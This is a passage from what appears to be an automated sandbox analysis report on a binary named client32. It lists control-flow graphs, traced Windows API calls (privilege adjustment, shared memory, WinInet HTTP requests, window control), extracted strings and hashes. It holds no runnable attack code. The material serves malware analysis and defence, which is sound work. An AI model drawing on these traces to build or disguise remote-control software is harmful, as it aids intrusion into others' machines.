894->822 896 1109ebda-1109ec05 SetEvent call 110d6c20 call 1109d8f0 895->896 897 1109ebc2-1109ebd8 ResetEvent * 3 895->897 896->780 897->896
                                                                                                                APIs
                                                                                                                  • Part of subcall function 1109D860: GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,0BAD89F8,00080000,00000000,?), ref: 1109D88D
                                                                                                                  • Part of subcall function 1109D860: OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
                                                                                                                  • Part of subcall function 1109D860: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
                                                                                                                  • Part of subcall function 1109D860: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9
                                                                                                                • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,0BAD89F8,00080000,00000000,?), ref: 1109E645
                                                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E65E
                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E669
                                                                                                                • GetVersionExA.KERNEL32(?), ref: 1109E680
                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E6EE
                                                                                                                • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E703
                                                                                                                • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E714
                                                                                                                • CreateFileMappingA.KERNEL32(000000FF,11030703,00000004,00000000,?,?), ref: 1109E750
                                                                                                                • GetLastError.KERNEL32 ref: 1109E75D
                                                                                                                • LocalFree.KERNEL32(?), ref: 1109E786
                                                                                                                • LocalFree.KERNEL32(?), ref: 1109E793
                                                                                                                • GetLastError.KERNEL32 ref: 1109E7B0
                                                                                                                • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E7CE
                                                                                                                • LocalFree.KERNEL32(?), ref: 1109E7F9
                                                                                                                • LocalFree.KERNEL32(?), ref: 1109E806
                                                                                                                  • Part of subcall function 1109D7D0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109E69E), ref: 1109D7D8
                                                                                                                  • Part of subcall function 1109D810: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D824
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E832
                                                                                                                • LocalFree.KERNEL32(?), ref: 1109E8FB
                                                                                                                • LocalFree.KERNEL32(?), ref: 1109E908
                                                                                                                • _memset.LIBCMT ref: 1109E920
                                                                                                                • GetTickCount.KERNEL32 ref: 1109E928
                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 1109E9D4
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E9EF
                                                                                                                • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109EA3B
                                                                                                                • GetLastError.KERNEL32 ref: 1109EA44
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 1109EA4B
                                                                                                                • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EA80
                                                                                                                • GetLastError.KERNEL32 ref: 1109EA89
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 1109EA90
                                                                                                                • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109EAC6
                                                                                                                • GetLastError.KERNEL32 ref: 1109EACF
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 1109EAD6
                                                                                                                • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EB0B
                                                                                                                • GetLastError.KERNEL32 ref: 1109EB1A
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 1109EB1D
                                                                                                                • LocalFree.KERNEL32(?), ref: 1109EB45
                                                                                                                • LocalFree.KERNEL32(?), ref: 1109EB52
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 1109EB83
                                                                                                                • CreateThread.KERNEL32(00000000,00002000,Function_0009E140,00000000,00000000,00000030), ref: 1109EB9D
                                                                                                                • ResetEvent.KERNEL32(?), ref: 1109EBCC
                                                                                                                • ResetEvent.KERNEL32(?), ref: 1109EBD2
                                                                                                                • ResetEvent.KERNEL32(?), ref: 1109EBD8
                                                                                                                • SetEvent.KERNEL32(?), ref: 1109EBDE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                                                • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                                                • API String ID: 3291243470-2792520954
                                                                                                                • Opcode ID: 5f128e5d137d7e61479c73dee0859362bd36eaaf37b2cb873371865b9cdea2a1
                                                                                                                • Instruction ID: a3fd055aacadca8d823d44ca49761fd5d24e706f53ed4dbc48f97bf713fa71f6
                                                                                                                • Opcode Fuzzy Hash: 5f128e5d137d7e61479c73dee0859362bd36eaaf37b2cb873371865b9cdea2a1
                                                                                                                • Instruction Fuzzy Hash: A612B2B5E0026D9FEB24DF60CDD4EAAB7BAFB88304F0049A9E51D97640D671AD84CF50

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 902 11029bb0-11029c3e LoadLibraryA 903 11029c41-11029c46 902->903 904 11029c48-11029c4b 903->904 905 11029c4d-11029c50 903->905 906 11029c65-11029c6a 904->906 907 11029c52-11029c55 905->907 908 11029c57-11029c62 905->908 909 11029c99-11029ca5 906->909 910 11029c6c-11029c71 906->910 907->906 908->906 913 11029d4a-11029d4d 909->913 914 11029cab-11029cc3 call 11163a11 909->914 911 11029c73-11029c8a GetProcAddress 910->911 912 11029c8c-11029c8f 910->912 911->912 915 11029c91-11029c93 SetLastError 911->915 912->909 917 11029d68-11029d80 InternetOpenA 913->917 918 11029d4f-11029d66 GetProcAddress 913->918 924 11029ce4-11029cf0 914->924 925 11029cc5-11029cde GetProcAddress 914->925 915->909 922 11029da4-11029db0 call 11163aa5 917->922 918->917 921 11029d99-11029da1 SetLastError 918->921 921->922 928 11029db6-11029de7 call 11142e60 call 11165250 922->928 929 1102a02a-1102a034 922->929 931 11029cf2-11029cfb GetLastError 924->931 934 11029d11-11029d13 924->934 925->924 927 11029d82-11029d8a SetLastError 925->927 927->931 953 11029de9-11029dec 928->953 954 11029def-11029e04 call 11081d30 * 2 928->954 929->903 933 1102a03a 929->933 931->934 935 11029cfd-11029d0f call 11163aa5 call 11163a11 931->935 937 1102a04c-1102a04f 933->937 938 11029d30-11029d3c 934->938 939 11029d15-11029d2e GetProcAddress 934->939 935->934 944 1102a051-1102a056 937->944 945 1102a05b-1102a05e 937->945 938->913 957 11029d3e-11029d47 938->957 939->938 943 11029d8f-11029d97 SetLastError 939->943 943->913 949 1102a1bf-1102a1c7 944->949 950 1102a060-1102a065 945->950 951 1102a06a 945->951 955 1102a1d0-1102a1e3 949->955 956 1102a1c9-1102a1ca FreeLibrary 949->956 958 1102a18f-1102a194 950->958 959 1102a06d-1102a075 951->959 953->954 977 11029e06-11029e0a 954->977 978 11029e0d-11029e19 954->978 956->955 957->913 960 1102a196-1102a1ad GetProcAddress 958->960 961 1102a1af-1102a1b5 958->961 963 1102a077-1102a08e GetProcAddress 959->963 964 1102a094-1102a09d 959->964 960->961 965 1102a1b7-1102a1b9 SetLastError 960->965 961->949 963->964 967 1102a14e-1102a150 SetLastError 963->967 968 1102a0a0-1102a0a2 964->968 965->949 970 1102a156-1102a15d 967->970 968->970 972 1102a0a8-1102a0ad 968->972 973 1102a16c-1102a18d call 11027f00 * 2 970->973 972->973 975 1102a0b3-1102a0ef call 11110230 call 11027eb0 972->975 973->958 1003 1102a101-1102a103 975->1003 1004 1102a0f1-1102a0f4 975->1004 977->978 981 11029e44-11029e49 978->981 982 11029e1b-11029e1d 978->982 986 11029e4b-11029e5c GetProcAddress 981->986 987 11029e5e-11029e75 InternetConnectA 981->987 983 11029e34-11029e3a 982->983 984 11029e1f-11029e32 GetProcAddress 982->984 983->981 984->983 989 11029e3c-11029e3e SetLastError 984->989 986->987 991 11029ea1-11029eac SetLastError 986->991 992 1102a017-1102a027 call 11162777 987->992 993 11029e7b-11029e7e 987->993 989->981 991->992 992->929 998 11029e80-11029e82 993->998 999 11029eb9-11029ec1 993->999 1005 11029e84-11029e97 GetProcAddress 998->1005 1006 11029e99-11029e9f 998->1006 1001 11029ec3-11029ed7 GetProcAddress 999->1001 1002 11029ed9-11029ef4 999->1002 1001->1002 1007 11029ef6-11029efe SetLastError 1001->1007 1013 11029f01-11029f04 1002->1013 1009 1102a105 1003->1009 1010 1102a10c-1102a111 1003->1010 1004->1003 1008 1102a0f6-1102a0fa 1004->1008 1005->1006 1011 11029eb1-11029eb3 SetLastError 1005->1011 1006->999 1007->1013 1008->1003 1014 1102a0fc 1008->1014 1009->1010 1015 1102a113-1102a129 call 110d12e0 1010->1015 1016 1102a12c-1102a12e 1010->1016 1011->999 1020 1102a012-1102a015 1013->1020 1021 11029f0a-11029f0f 1013->1021 1014->1003 1015->1016 1018 1102a130-1102a132 1016->1018 1019 1102a134-1102a145 call 11162777 1016->1019 1018->1019 1023 1102a15f-1102a169 call 11162777 1018->1023 1019->973 1033 1102a147-1102a149 1019->1033 1020->992 1027 1102a03c-1102a049 call 11162777 1020->1027 1025 11029f11-11029f28 GetProcAddress 1021->1025 1026 11029f2a-11029f36 1021->1026 1023->973 1025->1026 1032 11029f38-11029f40 SetLastError 1025->1032 1037 11029f42-11029f5b GetLastError 1026->1037 1027->937 1032->1037 1033->959 1038 11029f76-11029f8b 1037->1038 1039 11029f5d-11029f74 GetProcAddress 1037->1039 1042 11029f95-11029fa3 GetLastError 1038->1042 1039->1038 1040 11029f8d-11029f8f SetLastError 1039->1040 1040->1042 1043 11029fa5-11029faa 1042->1043 1044 11029fac-11029fb8 GetDesktopWindow 1042->1044 1043->1044 1045 1102a002-1102a007 1043->1045 1046 11029fd3-11029fef 1044->1046 1047 11029fba-11029fd1 GetProcAddress 1044->1047 1045->1020 1049 1102a009-1102a00f 1045->1049 1046->1020 1051 11029ff1 1046->1051 1047->1046 1048 11029ff6-1102a000 SetLastError 1047->1048 1048->1020 1049->1020 1051->1013
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(WinInet.dll,0BAD89F8,771B23A0,?,00000000), ref: 11029BE5
                                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029C7F
                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029C93
                                                                                                                • _malloc.LIBCMT ref: 11029CB7
                                                                                                                • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029CD1
                                                                                                                • GetLastError.KERNEL32 ref: 11029CF2
                                                                                                                • _free.LIBCMT ref: 11029CFE
                                                                                                                • _malloc.LIBCMT ref: 11029D07
                                                                                                                • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029D21
                                                                                                                • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 11029D5B
                                                                                                                • InternetOpenA.WININET(11195264,?,?,000000FF,00000000), ref: 11029D7A
                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029D84
                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029D91
                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029D9B
                                                                                                                • _free.LIBCMT ref: 11029DA5
                                                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E25
                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029E3E
                                                                                                                • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029E51
                                                                                                                • InternetConnectA.WININET(000000FF,1119A6C0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 11029E6E
                                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E8A
                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029EA3
                                                                                                                • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029EC9
                                                                                                                • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 11029F1D
                                                                                                                • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 1102A083
                                                                                                                • SetLastError.KERNEL32(00000078), ref: 1102A150
                                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102A1A2
                                                                                                                • SetLastError.KERNEL32(00000078), ref: 1102A1B9
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 1102A1CA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ErrorLast$FreeInternetLibrary_free_malloc$ConnectHeapLoadOpen
                                                                                                                • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                                                • API String ID: 921868004-913974648
                                                                                                                • Opcode ID: fdbdbda9e1d813da9675ceccfd2c9c36ae8d492f7c40484b8121e6de466b6977
                                                                                                                • Instruction ID: fedf281c9ee5d08c3a8f43e513d3e5c088d5a5ed6dab1fd82504b865b87691ba
                                                                                                                • Opcode Fuzzy Hash: fdbdbda9e1d813da9675ceccfd2c9c36ae8d492f7c40484b8121e6de466b6977
                                                                                                                • Instruction Fuzzy Hash: 8012AC70D40229DBEB11DFE5CC88AAEFBF8FF88754F604169E425A7600EB745980CB60
                                                                                                                APIs
                                                                                                                  • Part of subcall function 11145A70: GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
                                                                                                                  • Part of subcall function 11145A70: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5
                                                                                                                • _fgets.LIBCMT ref: 110628E2
                                                                                                                • _strpbrk.LIBCMT ref: 11062949
                                                                                                                • _fgets.LIBCMT ref: 11062A4C
                                                                                                                • _strpbrk.LIBCMT ref: 11062AC3
                                                                                                                • __wcstoui64.LIBCMT ref: 11062ADC
                                                                                                                • _fgets.LIBCMT ref: 11062B55
                                                                                                                • _strpbrk.LIBCMT ref: 11062B7B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                                                • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                                                • API String ID: 716802716-1571441106
                                                                                                                • Opcode ID: 331213c4ead450b5d9572f09714e784bc8a225cd8e9db223fb3838c6d78684b6
                                                                                                                • Instruction ID: a72cdd11ea0a2970362cd59f127853d680cd45206dcb20ec64d0abc9fb05f950
                                                                                                                • Opcode Fuzzy Hash: 331213c4ead450b5d9572f09714e784bc8a225cd8e9db223fb3838c6d78684b6
                                                                                                                • Instruction Fuzzy Hash: 7DA2C475E0465A9FEB11CF64DC40BEFB7B8AF44345F0441D8E849AB280EB71AA45CF91

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1785 11139ed0-11139f05 1786 11139f12-11139f19 1785->1786 1787 11139f07-11139f0d GetCurrentThreadId 1785->1787 1788 11139f20-11139f3c call 11134830 call 11134310 1786->1788 1789 11139f1b call 11029950 1786->1789 1787->1786 1795 11139f42-11139f48 1788->1795 1796 1113a01b-1113a022 1788->1796 1789->1788 1797 1113a59a-1113a5b5 call 11162bb7 1795->1797 1798 11139f4e-11139faf call 11139a70 IsWindow IsWindowVisible call 11147060 call 1105e820 IsWindowVisible 1795->1798 1799 1113a0da-1113a0f0 1796->1799 1800 1113a028-1113a02f 1796->1800 1838 1113a011 1798->1838 1839 11139fb1-11139fb7 1798->1839 1809 1113a0f6-1113a0fd 1799->1809 1810 1113a22f 1799->1810 1800->1799 1803 1113a035-1113a03c 1800->1803 1803->1799 1807 1113a042-1113a051 FindWindowA 1803->1807 1807->1799 1808 1113a057-1113a05c IsWindowVisible 1807->1808 1808->1799 1812 1113a05e-1113a065 1808->1812 1813 1113a0ff-1113a109 1809->1813 1814 1113a10e-1113a12e call 1105e820 1809->1814 1815 1113a231-1113a242 1810->1815 1816 1113a275-1113a280 1810->1816 1812->1799 1818 1113a067-1113a08c call 11139a70 IsWindowVisible 1812->1818 1813->1816 1814->1816 1835 1113a134-1113a163 1814->1835 1820 1113a244-1113a254 1815->1820 1821 1113a25a-1113a26f 1815->1821 1822 1113a282-1113a2a2 call 1105e820 1816->1822 1823 1113a2b6-1113a2bc 1816->1823 1818->1799 1842 1113a08e-1113a09d IsIconic 1818->1842 1820->1821 1821->1816 1845 1113a2b0 1822->1845 1846 1113a2a4-1113a2ae call 1102d750 1822->1846 1825 1113a2be-1113a2ca call 11139a70 1823->1825 1826 1113a2cd-1113a2d5 1823->1826 1825->1826 1833 1113a2e7 1826->1833 1834 1113a2d7-1113a2e2 call 1106c340 1826->1834 1844 1113a2e7 call 1112ddd0 1833->1844 1834->1833 1854 1113a165-1113a179 call 11081d30 1835->1854 1855 1113a17e-1113a191 call 11143e00 1835->1855 1838->1796 1839->1838 1840 11139fb9-11139fd0 call 11147060 GetForegroundWindow 1839->1840 1859 11139fd2-11139ffc EnableWindow call 11132120 * 2 EnableWindow 1840->1859 1860 11139ffe-1113a000 1840->1860 1842->1799 1848 1113a09f-1113a0ba GetForegroundWindow call 11132120 * 2 1842->1848 1850 1113a2ec-1113a2f2 1844->1850 1845->1823 1846->1823 1893 1113a0cb-1113a0d4 EnableWindow 1848->1893 1894 1113a0bc-1113a0c2 1848->1894 1856 1113a2f4-1113a2fa call 11132a10 1850->1856 1857 1113a2fd-1113a306 1850->1857 1854->1855 1884 1113a17b 1854->1884 1876 1113a193-1113a1a4 GetLastError call 11147060 1855->1876 1877 1113a1ae-1113a1b5 1855->1877 1856->1857 1865 1113a314 call 111326b0 1857->1865 1866 1113a308-1113a30b 1857->1866 1859->1860 1860->1838 1869 1113a002-1113a008 1860->1869 1874 1113a319-1113a31f 1865->1874 1866->1874 1875 1113a30d-1113a312 call 11132780 1866->1875 1869->1838 1882 1113a00a-1113a00b SetForegroundWindow 1869->1882 1880 1113a325-1113a32b 1874->1880 1881 1113a429-1113a434 call 11139600 1874->1881 1875->1874 1876->1877 1887 1113a1b7-1113a1d2 1877->1887 1888 1113a228 1877->1888 1890 1113a331-1113a339 1880->1890 1891 1113a3db-1113a3e3 1880->1891 1903 1113a436-1113a448 call 110642e0 1881->1903 1904 1113a455-1113a45b 1881->1904 1882->1838 1884->1855 1901 1113a1d5-1113a1e1 1887->1901 1888->1810 1890->1881 1897 1113a33f-1113a345 1890->1897 1891->1881 1900 1113a3e5-1113a423 call 1103f920 call 1103f960 call 1103f980 call 1103f940 call 11110000 1891->1900 1893->1799 1894->1893 1899 1113a0c4-1113a0c5 SetForegroundWindow 1894->1899 1897->1881 1902 1113a34b-1113a362 call 111101b0 1897->1902 1899->1893 1900->1881 1909 1113a1e3-1113a1f7 call 11081d30 1901->1909 1910 1113a1fc-1113a209 call 11143e00 1901->1910 1922 1113a384 1902->1922 1923 1113a364-1113a382 call 11057eb0 1902->1923 1903->1904 1925 1113a44a-1113a450 call 11142d90 1903->1925 1907 1113a461-1113a468 1904->1907 1908 1113a58a-1113a592 1904->1908 1907->1908 1914 1113a46e-1113a487 call 1105e820 1907->1914 1908->1797 1909->1910 1929 1113a1f9 1909->1929 1910->1888 1931 1113a20b-1113a226 GetLastError call 11147060 1910->1931 1914->1908 1935 1113a48d-1113a4a0 1914->1935 1932 1113a386-1113a3d2 call 1110fff0 call 1104d790 call 1104ecd0 call 1104ed40 call 1104d7d0 1922->1932 1923->1932 1925->1904 1929->1910 1931->1816 1932->1881 1965 1113a3d4-1113a3d9 call 110ec320 1932->1965 1946 1113a4a2-1113a4a8 1935->1946 1947 1113a4cd-1113a4d3 1935->1947 1950 1113a4aa-1113a4c8 call 11147060 GetTickCount 1946->1950 1951 1113a4d9-1113a4e5 GetTickCount 1946->1951 1947->1908 1947->1951 1950->1908 1951->1908 1954 1113a4eb-1113a52b call 11143a50 call 11147af0 call 11143a50 call 110261a0 1951->1954 1971 1113a530-1113a535 1954->1971 1965->1881 1971->1971 1972 1113a537-1113a53d 1971->1972 1973 1113a540-1113a545 1972->1973 1973->1973 1974 1113a547-1113a571 call 1112d6e0 1973->1974 1977 1113a573-1113a574 FreeLibrary 1974->1977 1978 1113a57a-1113a587 call 11162777 1974->1978 1977->1978 1978->1908
                                                                                                                APIs
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 11139F07
                                                                                                                • IsWindow.USER32(0002045A), ref: 11139F65
                                                                                                                • IsWindowVisible.USER32(0002045A), ref: 11139F73
                                                                                                                • IsWindowVisible.USER32(0002045A), ref: 11139FAB
                                                                                                                • GetForegroundWindow.USER32 ref: 11139FC6
                                                                                                                • EnableWindow.USER32(0002045A,00000000), ref: 11139FE0
                                                                                                                • EnableWindow.USER32(0002045A,00000001), ref: 11139FFC
                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 1113A00B
                                                                                                                • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 1113A049
                                                                                                                • IsWindowVisible.USER32(00000000), ref: 1113A058
                                                                                                                • IsWindowVisible.USER32(0002045A), ref: 1113A088
                                                                                                                • IsIconic.USER32(0002045A), ref: 1113A095
                                                                                                                • GetForegroundWindow.USER32 ref: 1113A09F
                                                                                                                  • Part of subcall function 11132120: ShowWindow.USER32(0002045A,00000000,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132144
                                                                                                                  • Part of subcall function 11132120: ShowWindow.USER32(0002045A,11139EA2,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132156
                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 1113A0C5
                                                                                                                • EnableWindow.USER32(0002045A,00000001), ref: 1113A0D4
                                                                                                                • GetLastError.KERNEL32 ref: 1113A193
                                                                                                                • GetLastError.KERNEL32 ref: 1113A20B
                                                                                                                • GetTickCount.KERNEL32 ref: 1113A4B8
                                                                                                                • GetTickCount.KERNEL32 ref: 1113A4D9
                                                                                                                  • Part of subcall function 110261A0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,1113A522), ref: 110261A8
                                                                                                                • FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 1113A574
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
